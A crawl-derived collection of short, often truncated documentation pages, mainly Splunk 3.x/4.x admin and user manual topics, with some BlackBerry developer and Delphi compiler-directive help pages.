http://docs.splunk.com/Documentation/Splunk/3.4.10/admin/Crawlconf
2012-05-26T17:18:43
crawl-003
crawl-003-017
[]
docs.splunk.com
Help Center Local Navigation BlackBerry Smartphone Simulator The BlackBerry®® MDS Simulator and the BlackBerry® Email Simulator are available for this purpose. To get the BlackBerry Smartphone Simulator, visit and download the BlackBerry® Java® Development Environment or the BlackBerry Java Development Environment Component Package. Was this information helpful? Send us your comments.
http://docs.blackberry.com/en/developers/deliverables/5827/The_BB_Smrtphn_simulator_447179_11.jsp
2012-05-26T22:50:31
crawl-003
crawl-003-017
[]
docs.blackberry.com
Help Center Local Navigation Search This Document Using BlackBerry Messenger with a BlackBerry Application You can integrate a BlackBerry® Java® Application with the BlackBerry® Messenger application. This could be useful if you are creating a turn-based game application for the BlackBerry device. To create a BlackBerry Java Application that integrates with the BlackBerry Messenger application, you can use the classes in the net.rim.blackberry.api.blackberrymessenger package. For more information about using the BlackBerryMessenger class, see the BlackBerry API Reference . Was this information helpful? Send us your comments.
http://docs.blackberry.com/en/developers/deliverables/5827/Using_BB_Messenger_with_a_BB_application_447286_11.jsp
2012-05-26T22:50:43
crawl-003
crawl-003-017
[]
docs.blackberry.com
Help Center Local Navigation Using listeners to respond to application changes A BlackBerry® Java® Application can register change listeners on the email and organizer data stores and in the phone application. The listeners allow the BlackBerry Java Application to take immediate action when the BlackBerry device user performs a local event. You can use the email and organizer data listeners to notify a BlackBerry Java Application when new entries arrive or when the BlackBerry device user makes changes such as additions, deletions, or updates, to the existing data. You can use phone listeners to listen for phone call actions, such as the initiation of new calls or calls ending. Was this information helpful? Send us your comments.
http://docs.blackberry.com/en/developers/deliverables/5827/Using_listeners_to_respond_to_application_changes_447148_11.jsp
2012-05-26T22:50:49
crawl-003
crawl-003-017
[]
docs.blackberry.com
restart your Splunk server to read the new changes in.. You can also add Splunk to your path.
http://docs.splunk.com/Documentation/Splunk/3.4.8/admin/EnableHTTPS
2012-05-27T01:53:01
crawl-003
crawl-003-017
[]
docs.splunk.com
,. Point. receiving via Splunk Web. - Navigate to Splunk Web on the server that will receive data for indexing. - Click the Admin link in the upper right hand corner of Splunk Web. - Select the Distributed tab. - Click Receive Data. - To begin receiving data: - Set the radio button to Yes. - Specify the port that you want Splunk to listen on. This is also the port that Splunk instances use to forward data to this server. - Click the Save button to commit the configuration. Restart Splunk for your changes to take effect. via Splunk CLI Enable receiving from Splunk's CLI. To use Splunk's CLI, navigate to the $SPLUNK_HOME/bin/ directory and use the ./splunk command. Also, add Splunk to your path need to restart the Splunk Server for your changes to take effect. Forwarding You must first configure your receiving Splunk host using the instructions above before configuring forwarders. via Splunk Web Enable forwarding via Splunk Web. - Navigate to Splunk Web on the server that will be forwarding data for indexing. - Click the Admin link in the upper right-hand corner of Splunk Web. - Select the Distributed tab. - Click Forward Data. To begin forwarding data: - Set the Forward data to other Splunk Servers? radio button to Yes. - Specify whether you want to keep a copy of the data local in addition to forwarding or just forward. Keeping a local copy allows you to search from the local server, but requires more space and memory. - Specify the Splunk server(s) and port number to forward data to. The port number should be the same one that you specified when you configured receiving. - Click the Save button to commit the configuration. Restart Splunk for your changes to take effect. via Splunk CLI Enable forwarding from the Splunk CLI. Navigate to your $SPLUNK_HOME/bin directory on the forwarding server and log in to the CLI. Also add Splunk to your path and use the splunk command. ./splunk login Splunk username: admin Password: To enable forwarding: # ./splunk add forward-server <host:port> -auth admin:changeme where <host:port> are the hostname and port of the Splunk server to which this forwarder or light forwarder should send data. To disable forwarding: # ..
http://docs.splunk.com/Documentation/Splunk/3.4.8/admin/EnableForwardingAndReceiving#Receiving
2012-05-27T01:52:56
crawl-003
crawl-003-017
[]
docs.splunk.com
. Set host statically for every event in the same input, or dynamically with regex or segment on the full path of the source. To assign a different host for different sources or sourcetypes in the same input, extract host per event. Statically This method assigns the same host for every event for the input. Also, this will only impact new data coming in via the input. If you need to correct the host displayed in Splunk Web for data that has already been indexed, you will need to tag hosts instead. via Splunk Web how configuration files work. Configuration [<inputtype>://<path>] host = $YOUR_HOST sourcetype = $YOUR_SOURCETYPE source = $YOUR_SOURCE Learn more about inputs types....
http://docs.splunk.com/Documentation/Splunk/3.4.8/admin/DefineHostAssignmentForAnInput
2012-05-27T01:52:34
crawl-003
crawl-003-017
[]
docs.splunk.com
Set up alerts via savedsearches.conf This documentation does not apply to the most recent version of Splunk. Click here for the latest version. Set up alerts via..
http://docs.splunk.com/Documentation/Splunk/3.4.9/Admin/SetUpAlertsViaSavedsearchesconf
2012-05-27T03:14:16
crawl-003
crawl-003-017
[]
docs.splunk.com
Plan a deployment This documentation does not apply to the most recent version of Splunk. Click here for the latest version. Contents Plan a deployment If you've got Splunk instances serving a variety of different populations within your organization, chances are their configurations vary depending on who uses them and for what purpose. You may have some number Splunk instances serving the helpdesk team, configured with a specific app to accelerate troubleshooting of Windows desktop issues. You may have another group of Splunk instances in use by your operations staff, set up with a few different apps designed specially to emphasize tracking of network issues, security incidents, and email traffic management. A third group of Splunk instances might serve the Web hosting group within the operations team. Rather than having to manage and maintain these divergent Splunk instances one at a time, you can put them into groups based on their usage, identify the various configurations and apps needed by each group, and then use the deployment server to handle updating their various apps and configurations as needed. You can group your Splunk instances for easier management when using the deployment server. You might simply have your Splunk instances grouped by OS or hardware type, by version, or by geographical location or timezone. Configuration overview For the great majority of deployment server configurations, you'll do the following: - Designate one of your Splunk servers as the deployment server. Group the deployment clients into "server classes". A server class defines the content that is pushed out to the clients that belong to it. A given deployment client can belong to multiple server classes at the same time. A deployment server can also be a deployment client of itself, as long as the location you specify for the client to get the content from is different from the location it is supposed to put retrieved content into. - The deployment server will hold the serverclass.conf file that defines the server classes that your deployment clients belong to. It will also hold the repository of content (Apps, configurations) to be pushed out. Refer to "Define server classes" in this manual for details. - You can tell each server class you define to get its content from a particular location and to put it into a particular location when it gets it. - Each deployment client will have a deploymentclient.conf that specifies what deployment server it should communicate with, the specific location on that server from which it should pick up content, and where it should put it locally. Refer to "Configure deployment clients" in this manual for details. - For more complex deployments, you can edit tenants.conf. This allows you to define multiple deployment servers, and redirect incoming client requests to them using rules you specify. Refer to "Deploy in multi-tenant environments" in this manual for more information about configuring tenants.conf. Most deployment server topologies don't require that you touch tenants.conf, however. Note: The deployment server and its deployment clients must agree in the SSL setting for their spl the instances of Splunk. Once you've got it up and configured, you just need to use the CLI reload command as described in "Deploy or update Apps and configurations".
http://docs.splunk.com/Documentation/Splunk/4.0.1/Admin/Planadeployment
2012-05-27T02:51:31
crawl-003
crawl-003-017
[]
docs.splunk.com
. If you get stuck, Splunk's CLI has built-in help. Access the main CLI help by typing splunk help. Individual commands have their own help pages as well -- type splunk help <command>. CLI commands for input configuration The following commands are available for input configuration via the CLI: Change the configuration of each data input type by setting additional parameters. Parameters are set via the syntax: -parameter value. Note: You can only set one -hostname, -hostregex or -hostsegmentnum per command. Example 1. monitor files in a directory The following example shows how to monitor files in /var/log/: Add /var/log/ as a data input: ./splunk add monitor /var/log/ Example 2. monitor windowsupdate.log The following example shows how to monitor the Windows Update log (where Windows logs automatic updates):.
http://docs.splunk.com/Documentation/Splunk/4.0.1/Admin/MonitorfilesanddirectoriesusingtheCLI
2012-05-27T02:51:18
crawl-003
crawl-003-017
[]
docs.splunk.com
Monitor files and directories This documentation does not apply to the most recent version of Splunk. Click here for the latest version. Contents Monitor files and directories Splunk has two file input processors: monitor and upload. For the most part, you can use monitor to add all your data sources from files and directories. However, you may want to use upload when you want to add one-time inputs, such as an archive of historical data. This topic discusses how to add monitor and upload inputs using Splunk Web and the configuration files. You can also add, edit, and list monitor inputs using the CLI; for more information, read this topic. How monitor works in Splunk Specify a path to a file or directory and Splunk's monitor processor consumes any new input. This is how you'd monitor live application logs such as those coming from J2EE or .Net applications, Web access logs, and so on. Splunk will continue to index the data in this file or directory as it comes in. You can also specify a mounted or shared directory, including network filesystems, as long as the Splunk server can read from the directory. If the specified directory contains subdirectories, Splunk recursively examines them for new files. Splunk checks for the file or directory specified in a monitor configuration on Splunk server start and restart. If the file or directory specified is not present on start, Splunk checks for it again in 24 intervals from the time of the last restart. Subdirectories of monitored directories are scanned continuously. To add new inputs without restarting Splunk, use Splunk Web or the command line interface. If you want Splunk to find potential new inputs automatically, use crawl. When using monitor: - the following common archive file types: .tar, .gz, .bz2, .tar.bz2 , and .zip. - Splunk detects log file rotation and does not process renamed files it has already indexed (with the exception of .tar and .gz archives; for more information see "Log file rotation" in this manual). - The entire dir/filename path must not exceed 1024 characters. - Set the sourcetype for directories to Automatic. If the directory contains multiple files of different formats, do not set a value for the source type manually. Manually setting a source type forces a single source type for all files in that directory. - same directory or file. If you want to see changes in a directory, use file system change monitor. If you want to index new events in a directory, use monitor. Note: Monitor input stanzas may not overlap. That is, monitoring /a/path while also monitoring /a/path/subdir will produce unreliable results. Similarly, monitor input stanzas which watch the same directory with different whitelists, blacklists, and wildcard components are not supported. Why use upload or batch Use the Upload a local file or Index a file on the Splunk server options to index a static file one time. The file will not be monitored on an ongoing basis.. Monitor files and directories in Splunk Web Add inputs from files and directories via Splunk Web. 1. Click Manager in the upper right-hand corner of Splunk Web. 2. Under System configurations, click Data Inputs. 3. Click Files and directories. 4. Click New to add an input. 5. Choose the radio button you want. You can: - Monitor a file or directory, which sets up an ongoing input--whenever more data is added to this file or directory, Splunk will index it. - Upload a local file from your local machine into Splunk. - Index a file on the Splunk server, which copies a file on the server into Splunk via the batch directory. 6. Specify the path to the file or directory. If you select Upload a local file, use the Browse... button. To monitor a shared network drive, enter the following: <myhost><mypath> (or \\<myhost>\<mypath> on Windows). Make sure Splunk has read access to the mounted drive as well as the files you wish to monitor. 7. Under the Host heading, select the host name. You have several choices if you are using Monitor or Batch methods. Learn more about setting host value. Note: Host only sets the host field in Splunk. It does not direct Splunk to look on a specific host on your network. 8. Now set the Source Type. Source type is a default field added to events. Source type is used to determine processing characteristics such as timestamps and event boundaries. 9. After specifying the source, host, and source type, click Submit. Define input stanzas in this manual before you begin. You can set any number of attributes and values following an input type. If you do not specify a value for one or more attributes, Splunk uses the defaults that are preset in $SPLUNK_HOME/etc/system/default/. Note: To ensure new events are indexed when you copy over an existing file with new contents, set CHECK_METHOD = modtime in props.conf for the source. This checks the modtime of the file and re-indexes when it changes. Note that the entire file is indexed, which can result in duplicate events. The following are options that you can use in both monitor and batch input stanzas. See the sections following for more attributes that are specific to each type of input. host = <string> - Set the host value of your input to a static value. host=is automatically prepended to the value when this shortcut is used. - Defaults to the IP address of fully qualified domain name of the host where the data originated. index = <string> - Set the index where events from this input will be stored. index=is automatically prepended to the value when this shortcut is used. - Defaults to main(or whatever you have set as your default index). - For more information about the index field, see "How indexing works" in this "About sourcetypes,". host_regex = <regular expression> - If specified, the regex extracts host from the filename of each input. - Specifically, the first group of the regex is used as the host. - Defaults to the default host=attribute if the regex fails to match. host_segment = <integer> - If specified, the '/' separated segment of the path is set as host. - Defaults to the default host::attribute if the value is not an integer, or is less than 1. Monitor syntax and examples Monitor input stanzas direct Splunk to watch all files in the <path> (or just <path> itself if it represents a single file). You must specify the input type and then the path, so put three slashes in your path if you're starting at root. You can use wildcards for the path. For more information, read how to "Specify input paths with wildcards". [monitor://<path>] <attrbute1> = <val1> <attrbute2> = <val2> ... The following are additional attributes you can use when defining monitor input stanzas. crcSalt = <string> - If set, this string is added to the CRC. - Use this setting to force Splunk to consume files that have matching CRCs. - If set to crcSalt = <SOURCE>(note: This setting is case sensitive), then the full source path is added to the CRC. followTail = 0|1 - If set to 1, monitoring begins at the end of the file (like tail -f). - This only applies to files the first time they are picked up. - After that, Splunk's internal file position records keep track of the file. _whitelist = <regular expression> - If set, files from this path are monitored only if they match the specified regex. _blacklist = <regular expression> - If set, files from this path are NOT monitored if they match the specified regex. Example 1. To load anything in /apache/foo/logs or /apache/bar/logs, etc. [monitor:///apache/.../logs] Example 2. To load anything in /apache/ that ends in .log. [monitor:///apache/*.log] consume destructively. Note: source = <string> and <KEY> = <string> are not used by batch. Example: This example batch loads all files from the directory /system/flight815/. [batch://system/flight815/*] move_policy = sink.
http://docs.splunk.com/Documentation/Splunk/4.0.1/Admin/Monitorfilesanddirectories
2012-05-27T02:51:14
crawl-003
crawl-003-017
[]
docs.splunk.com
Monitor changes to your filesystem This documentation does not apply to the most recent version of Splunk. Click here for the latest version. Contents Monitor changes to your filesystem Caution: Do not configure the file system change monitor to monitor your root filesystem. This can be dangerous and time-consuming if directory recursion is enabled. turned.
http://docs.splunk.com/Documentation/Splunk/4.0.1/Admin/Monitorchangestoyourfilesystem
2012-05-27T02:51:10
crawl-003
crawl-003-017
[]
docs.splunk.com
Monitor Windows Registry data This documentation does not apply to the most recent version of Splunk. Click here for the latest version. Contents Monitor Windows Registry data Splunk supports the capture of Windows registry settings and lets you monitor changes to the registry. You can know when registry entries are added, updated, and deleted. When a registry entry is changed, Splunk captures the name of the process that made the change and the key path from the hive to the entry being changed. The Windows registry input monitor application runs as a process called splunk-regmon.exe. Warning: Do not stop or kill the splunk-regmon.exe process manually; this could result in system instability. To stop the process, stop the Splunk server process from the Windows Task Manager or from within Splunk Web. Enable Registry monitoring in Splunk Web Splunk on Windows comes with Registry monitoring configured but disabled by default. You can perform a one-time baseline index and then separately enable ongoing monitoring for machine and/or user keys. To do this: 1. In Splunk Web, click Manager in the upper right corner. 2. Click Data inputs > Registry Monitoring 3. Choose Machine keys or User keys and enable the baseline and ongoing monitoring as desired. 4. Click Save. How it works: the details Windows registries can be extremely dynamic (thereby generating a great many events). Splunk provides a two-tiered configuration for fine-tuning the filters that are applied to the registry event data coming into Splunk. Splunk Windows registry monitoring uses two configuration files to determine what to monitor on your system, sysmon.conf and regmon-filters.conf, both located in $SPLUNK_HOME\etc\system\local\. These configuration files work as a hierarchy: sysmon.confcontains global settings for which event types (adds, deletes, renames, and so on) to monitor, which regular expression filters from the regmon-filters.conffile to use, and whether or not Windows registry events are monitored at all. regmon-filters.confcontains the specific regular expressions you create to refine and filter the hive key paths you want Splunk to monitor. sysmon.conf contains only one stanza, where you specify: event_types: the superset of registry event types you want to monitor. Can be delete, set, create, rename, open, close, query. active_filters: the list of regular expression filters you've defined in regmon-filters.confthat specify exactly which processes and hive paths you want Splunk to monitor. This is a comma-separated list of the stanza names from reg. disabled: whether to monitor registry settings changes or not. Set this to 0 to disable Windows registry monitoring altogether. Each stanza in regmon-filters.conf represents a particular filter whose definition includes: proc: a regular expression containing the path to the process or processes you want to monitor hive: a regular expression containing the hive path to the entry or entries you want to monitor. Splunk supports the root key value mappings predefined in Windows: \\REGISTRY\\USER\\maps to HKEY_USERSor HKU \\REGISTRY\\USER\\maps to HKEY_CURRENT_USERor HKCU \\REGISTRY\\USER\\_Classesmaps to HKEY_CLASSES_ROOTor HKCR \\REGISTRY\\MACHINEmaps to HKEY_LOCAL_MACHINE or {{HKLM \\REGISTRY\\MACHINE\\SOFTWARE\\Classesmaps to HKEY_CLASSES_ROOTor HKCR \\REGISTRY\\MACHINE\\SYSTEM\\CurrentControlSet\\Hardware Profiles\\Currentmaps to HKEY_CURRENT_CONFIGor HKCC type: the subset of event types to monitor. Can be delete, set, create, rename, open, close, query. The values here must be a subset of the values for event_typesthat you set in sysmon.conf. baseline: whether or not to capture a baseline snapshot for that particular hive path. 0 for no and 1 for yes. baseline interval: how long Splunk has to have been down before re-taking the snapshot, in seconds. The default value is 24 hours. Get a baseline snapshot When you enable Registry monitoring, you're given the option of recording a baseline snapshot of your registry hives the next time Splunk starts. By default, the snapshot covers the entirety of the user keys and machine keys. Note: Executing a splunk clean all -f deletes the current baseline snapshot. What to consider When you install Splunk on a Windows machine and enable registry monitoring, you specify which major hive paths to monitor: key users (HKEY) and/or key local machine (HKLM). Depending on how dynamic you expect the registry to be on this machine, checking both could result in a great deal of data for Splunk to monitor. If you're expecting a lot of registry events, you may want to specify some filters in regmon-filters.conf to narrow the scope of your monitoring immediately after you install Splunk and enable registry event monitoring but before you start Splunk up. Similarly, you have the option of capturing a baseline snapshot of the current state of your Windows registry when you first start Splunk, and again every time a specified amount of time has passed. The baselining process can be somewhat processor-intensive, and may take several minutes. You can postpone taking a baseline snapshot until you've edited regmon-filters.conf and narrowed the scope of the registry entries to those you specifically want Splunk to monitor. Configure Windows registry input Look at inputs.conf to see the default values for Windows registry input. They are also shown below. If you want to make changes to the default values, edit a copy of inputs.conf in $SPLUNK_HOME\etc\system\local\. You only have to provide values for the parameters you want to change within the stanza. For more information about how to work with Splunk configuration files, refer to About configuration files [script://$SPLUNK_HOME\bin\scripts\splunk-regmon.py]: The Splunk registry input monitoring script ( splunk-regmon.py) is configured as a scripted input. Do not change this value. Note: You must use two backslashes \\ to escape wildcards in stanza names in inputs.conf. Regexes with backslashes in them are not currently supported when specifying paths to.
http://docs.splunk.com/Documentation/Splunk/4.0.1/Admin/MonitorWindowsregistrydata
2012-05-27T02:51:06
crawl-003
crawl-003-017
[]
docs.splunk.com
Save and schedule searches, set alerts, and enable summary indexing This documentation does not apply to the most recent version of Splunk. Click here for the latest version. Contents Save and schedule searches, set alerts, and enable summary indexing You can turn any saved search Admin > Saved Searches into a scheduled alert. To schedule a saved search, define a frequency for your search to run. To turn a scheduled search into an alert, set conditions for triggering the alert. Then, define actions to perform when the alert conditions are met. For more information about using Splunk for alerting, watch this video. This page discusses how to save searches, schedule searches, and configure alert conditions. For more in-depth discussion of saved searches and alerting, see the Admin manual section on saved searches. Save a search First, create a saved search: 1. Click on the search bar drop-down menu and select Save search... This opens the Save search dialog box. 2. In the Search tab, name your search. 3. In the Search field, edit your search if necessary. 4. Select a role to share your saved search. You can Share with role Admin, Everybody, User, and Power, or Don't Share with anyone. 5. Check one more dashboards to save and display your search. 4. Click Save. Schedule a search Then, set a schedule for your search: 1. From the search bar menu, choose Save search... 2. Click the Schedule and Alert tab. 3. Under Schedule, check Run this search on a schedule. 4. Choose either Basic or Cron to define your schedule frequency. - Basic lets you choose from predefined schedule options, Run every: minute, 5 minutes, 30 minutes, hour, 12 hours, day at midnight, day at 6pm, and Saturday at midnight. - Cron lets you use cron notation to define your schedule frequency. Caution: Splunk implements cron differently than standard POSIX cron. Use the */n as "divide by n" (instead of crontab's "every n"). For example, enter */3* * * 1-5 to run your search every twenty minutes, Monday through Friday. Here are some other Splunk cron examples: "*/12 * * * *" : "Every 5 minutes" "*/2 * * * *" : "Every 30 minutes" "0 */2 * * *" : "Every 12 hours, on the hour" Specify time range To ensure that you get all the results within a time period, you may want to edit the Search field (in the Search tab) to include a specific time range in your search. For example, if you want all the results within an hour time window, such as between 4 PM and 5 PM: - Add the terms startminutesago=90and endminutesago=30to your search. - Use Cron notation to define your schedule on the half hour. Configure an alert After you schedule a search, you can configure an alert. Define alert conditions based on thresholds in the number of events, sources, and hosts in your results. When these conditions are met, Splunk notifies you via email or RSS feed. To configure an alert, define the alert condition: 1. In the first drop-down menu under Alert when, choose either always, number of events, number or sources, or number of hosts. 2. In the second drop-down menu under Alert when, choose a comparison operation: greater than, less than, equal to, rises by, or drops by. 3. In the text field under Alert when, enter a value. For example, you may want to "Alert when number of events [is] greater than 10". 4. Define how you want Splunk to notify you. - If you want to receive information in a RSS feed, check Create an RSS feed. - If you to receive email notification, enter one or more email addresses under Send email. Separate multiple addresses with a comma. Note: You can combine any of these options. 5. Next, if you want to include the search results in your alert, check Include results. 6. Finally, if you want to run a shell command when an alert triggers, enter the command under Trigger shell script. For example, you may want to trigger a script to generate an SNMP trap or call an API to send the event to another system. For more details on configuring alerts, see the Admin Manual topic on alerts. Specify fields to show When you receive alerts, Splunk includes all the fields in your search. Edit the starthoursago=3 | fields - $FIELD1,$FIELD2 + $FIELD3,$FIELD4 The alert you receive will exclude $FIELD1 and $FIELD2, but include $FIELD3 and $FIELD4. Enable summary indexing Summary indexing is an alert action that you can configure for any scheduled search which already exists. 1. In the Admin page in Splunk Web, create a scheduled search in the Saved searches heading. 2. Select Run this search on a schedule to configure alert properties for the scheduled search. If you want your search to run every time without checking for an alert condition, select "always" as the alert condition. 3. Check Enable summary indexing. 4. Optionally, add a field/value pair search results that are being summary indexed from the scheduled search. Once you enable summary indexing, configure it further by editing configuration files. When the summary indexing search runs, it will tell you that the result has been "stashed". Note: Currently, you can only add one field/value pair when configuring summary indexing in Splunk Web. You can add additional field/values to events by specifying them in savedsearches.conf. Note: Learn.
http://docs.splunk.com/Documentation/Splunk/3.4.8/User/SaveScheduleSetAlertsAndEnableSummaryIndexing
2012-05-26T18:40:10
crawl-003
crawl-003-017
[]
docs.splunk.com
Save options This documentation does not apply to the most recent version of Splunk. Click here for the latest version. Save options You can save any of your searches, schedule your saved searches, and define alert conditions for your scheduled searches. For more information, refer to the User Manual topic about Save, schedule, and alert options. Save a search trade_app_logouts events in the sampledata: index=sampledata eventtype=trade_app_logouts To save a search: 1. Click on the search bar menu. 2. Select Save search... from the menu. The Save Search dialog box opens. 3. In the "Search options" tab, name your search. (In 3.3, this is Search.) 4. Click Save. Note: When saving your search, you can choose to add it to one or more dashboards. Splunk lets you delete or modify your saved searches and add them to the dashboard. For more information on how to manage saved searches, refer to the User Manual's Find and manage saved searches page. Schedule the search From the search bar menu: 1. Choose Save search... 2. Click the Schedule & Alerts tab. (In 3.3, this is Schedule and Alert.) 3. Under Schedule, check "Run this search on a schedule". Note: You can define the schedule frequency with the Basic or Cron options. Schedule an alert After you schedule a search, you can define alert conditions based on thresholds in the number of events, sources, and hosts in your results. You can receive these alerts via RSS feed or email. You can also trigger a shell script, such as a script to generate an SNMP trap or call an API to send the event to another system. If you need additional email options (like setting the From: address) see the Alerts page in the Admin manual..
http://docs.splunk.com/Documentation/Splunk/3.4.8/User/SaveOptions
2012-05-26T18:40:01
crawl-003
crawl-003-017
[]
docs.splunk.com
Run reports This documentation does not apply to the most recent version of Splunk. Click here for the latest version. Contents Run reports Summarize the results of any search as a report using the report window in Splunk Web. Access the reports window in three ways: - After running a search, click Report on results >> located below the search bar. - Select Report on this field >> from any interactive field filter menu. - Pipe your search results to a reporting command (such as stats, top, or rare). For more information about reporting with Splunk, you can watch this video. Report on results Run any search in Splunk Web (either with the search bar, or by running a saved search). After the results load, click Report on results >> above the timeline options. This takes you to the reports page so you can build a new report. Select a field from the Fields list. Splunk updates your search string with | top <field name you selected> and displays a report. The default report displays: - A chart graphing the results (the top 100 values the field you selected). - A summary of the count and events matching your search. Tune a report by: - Adjusting the search string by using the search bar at the top of the page. - Adjusting the search's timerange using the timerange selection tools under the search bar (shows the current day by default). - Selecting fields to report on that Splunk identifies in the Fields panel. - Defining a data series or chart style using the Series panel. Select Back to search results to see your search results. Report on fields Report on any field that's in the Field menu. By default, Splunk lists host, source, sourcetype, and any indexed field in the Fields menu. Note: Add additional fields to the Field menu by using the fields picker (Fields drop-down menu above your search results). To report on fields: - Click on the Fields... menu. - From the list, check and apply src. - From the srcfilter menu, choose Report on this field >>. Splunk takes you to the report window and updates your search string: Modify your report the same way you do when you click on Report on results. Report using reporting commands Create reports using the search language. Pipe your search results to a reporting command. - Create useful graphs and time-based charts using chartand timechart. - See the most common or least common events using topand rare. - Create reports of statistics about your events using statsor eventstats. - See correlations, differences, and associations between fields in your data using associate, correlate, and diff. See examples of useful reports. Choose different charts Change chart styles by selecting a type from the display as drop-down menu above the current chart. Choose from the following chart types: See samples of these charts in the report gallery. Add a report to your dashboard Save a report just as you would any other search. When you save. Read more about saving searches to the dashboard in Manage saved searches. Note: You won't see your report on your dashboard if you haven't loaded any data to your main index. As soon as you have data in your main index, the "getting started" links are replaced with a default dashboard including modules that are predefined in the product, plus additional searches and reports you've added. Summary indexing Summary indexing allows you to search and run reports on a smaller, specially generated summary index instead of working with a much larger original data set. Use summary indexing to: - Index aggregate results. - Index running statistics (such as a running total). - Index rare original events into a smaller index for more efficient reporting..
http://docs.splunk.com/Documentation/Splunk/3.4.8/User/RunReports
2012-05-26T18:39:52
crawl-003
crawl-003-017
[]
docs.splunk.com
An interface type specified with dispinterface cannot specify an ancestor interface. program Produce; type IBase = interface end; IExtend = dispinterface (IBase) ['{00000000-0000-0000-0000-000000000000}'] end; begin end. In the example above, the error is caused because IExtend attempts to specify an ancestor interface type. program Solve; type IBase = interface end; IExtend = dispinterface ['{00000000-0000-0000-0000-000000000000}'] end; begin end. Generally there are two solutions when this error occurs: remove the ancestor interface declaration, or change the dispinterface into a regular interface type. In the example above, the former approach was taken.
http://docs.embarcadero.com/products/rad_studio/radstudio2007/RS2007_helpupdates/HUpdate4/EN/html/devcommon/cm_disp_intf_ancestor_xml.html
2012-05-27T03:06:27
crawl-003
crawl-003-017
[]
docs.embarcadero.com
A directive was encountered during the parsing of an interface which is not allowed. program Produce; type IBaseIntf = interface private procedure fnord(x, y, z : Integer); end; begin end. In this example, the compiler gives an error when it encounters the private directive, as it is not allowed in interface types. program Solve; type IBaseIntf = interface procedure fnord(x, y, z : Integer); end; TBaseClass = class (TInterfacedObject, IBaseIntf) private procedure fnord(x, y, z : Integer); end; procedure TBaseClass.fnord(x, y, z : Integer); begin end; begin end. The only solution to this problem is to remove the offending directive from the interface definition. While interfaces do not actually support these directives, you can place the implementing method into the desired visibility section. In this example, placing the TBaseClass.fnord procedure into a private section should have the desired results.
http://docs.embarcadero.com/products/rad_studio/radstudio2007/RS2007_helpupdates/HUpdate4/EN/html/devcommon/cm_directive_in_intf_xml.html
2012-05-27T03:06:22
crawl-003
crawl-003-017
[]
docs.embarcadero.com
Remarks Defines a Delphi conditional symbol with the given name. The symbol is recognized for the remainder of the compilation of the current module in which the symbol is declared, or until it appears in an {$UNDEF name} directive. The {$DEFINE name} directive has no effect if name is already defined.
http://docs.embarcadero.com/products/rad_studio/radstudio2007/RS2007_helpupdates/HUpdate4/EN/html/devcommon/compdirsdefinedirective_xml.html
2012-05-27T02:14:53
crawl-003
crawl-003-017
[]
docs.embarcadero.com
Remarks The $D directive in the {$D+} state, the integrated debugger lets you single-step and set breakpoints in that module. The Include debug info (Project|Options|Linker) and Map file (Project|Options|Linker) options produce complete line information for a given module only if you've compiled that module in the {$D+} state. The $D switch is usually used in conjunction with the $L switch, which enables and disables the generation of local symbol information for debugging.
http://docs.embarcadero.com/products/rad_studio/radstudio2007/RS2007_helpupdates/HUpdate4/EN/html/devcommon/compdirsdebuginformation_xml.html
2012-05-27T02:14:49
crawl-003
crawl-003-017
[]
docs.embarcadero.com
Conditional, {$DEFINE DEBUG} {$IFDEF DEBUG} Writeln('Debug is on.'); // this code executes {$ELSE} Writeln('Debug is off.'); // this code does not execute {$ENDIF} {$UNDEF DEBUG} {$IFNDEF DEBUG} Writeln('Debug is off.'); // this code executes {$ENDIF}. The following standard conditional symbols are defined: VER<nnn> Always defined, indicating the version number of the Delphi compiler. (Each compiler version has a corresponding predefined symbol. For example, compiler version 18.0 has VER180 defined.) MSWINDOWS Indicates that the operating environment is Windows. Use MSWINDOWS to test for any flavor of the Windows platform instead of WIN32. WIN32 Indicates that the operating environment is the Win32 API. Use WIN32 for distinguishing between specific Windows platforms, such as 32-bit versus 64-bit Windows. In general, don't limit code to WIN32 unless you know for sure that the code will not work in WIN64. Use MSWINDOWS instead. CLR Indicates the code will be compiled for the .NET platform. CPU386 Indicates that the CPU is an Intel 386 or better. CONSOLE Defined if an application is being compiled as a console application. CONDITIONALEXPRESSIONS Tests for the use of $IF directives. For example, to find out the version of the compiler and run-time library that was used to compile your code, you can use $IF with the CompilerVersion, RTLVersion and other constants: {$IFDEF CONDITIONALEXPRESSIONS} {$IF CompilerVersion >= 17.0} {$DEFINE HAS_INLINE} {$IFEND} {$IF RTLVersion >= 14.0} {$DEFINE HAS_ERROUTPUT} {$IFEND} {$ENDIF}
http://docs.embarcadero.com/products/rad_studio/radstudio2007/RS2007_helpupdates/HUpdate4/EN/html/devcommon/compdirsconditionalcompilation_xml.html
2012-05-27T02:14:44
crawl-003
crawl-003-017
[]
docs.embarcadero.com
Remarks The $B directive switches between the two different models of Delphi code generation for the and and or Boolean operators., which means that evaluation stops as soon as the result of the entire expression becomes evident in left to right order of evaluation.
http://docs.embarcadero.com/products/rad_studio/radstudio2007/RS2007_helpupdates/HUpdate4/EN/html/devcommon/compdirsbooleanshortcircuitevaluation_xml.html
2012-05-27T02:14:39
crawl-003
crawl-003-017
[]
docs.embarcadero.com
Remarks The $AUTOBOX directive controls whether value types are automatically “boxed” into reference types. The following code will not compile by default; the compiler halts with a message that I and Obj have incompatible types. var I: Integer; Obj: TObject; begin I:=5; Obj:=I; // compilation error end. Inserting {$AUTOBOX ON} anywhere before the offending line will remove the error, so this code compiles: var I: Integer; Obj: TObject; begin I:=5; {$AUTOBOX ON} Obj:=I; // I is autoboxed into a TObject end. Reference types can not be automatically “unboxed” into value types, so a typecast is required to turn the TObject into an Integer: var I: Integer; Obj: TObject; begin I:=5; {$AUTOBOX ON} Obj:=I; // OK // I:=Obj; // Can't automatically unbox; compilation error I:=Integer(Obj); // this works end. Turning on autoboxing can be convenient, but it makes Delphi less type safe, so it can be dangerous. With autoboxing, some errors that would otherwise be caught during compilation may cause problems at runtime. Boxing values into object references also consumes additional memory and degrades execution performance. With {$AUTOBOX ON}, you run the risk of not realizing how much of this data conversion is happening silently in your code. {$AUTOBOX OFF} is recommended for improved type checking and faster runtime execution. The $AUTOBOX directive has no effect in Delphi for Win32.
http://docs.embarcadero.com/products/rad_studio/radstudio2007/RS2007_helpupdates/HUpdate4/EN/html/devcommon/compdirsautobox_xml.html
2012-05-27T02:14:33
crawl-003
crawl-003-017
[]
docs.embarcadero.com
Extract and add new fields This documentation does not apply to the most recent version of Splunk. Click here for the latest version. beneath "Add fields from external data sources".
http://docs.splunk.com/Documentation/Splunk/4.0.10/User/ExtractNewFields
2012-05-26T16:51:46
crawl-003
crawl-003-017
[]
docs.splunk.com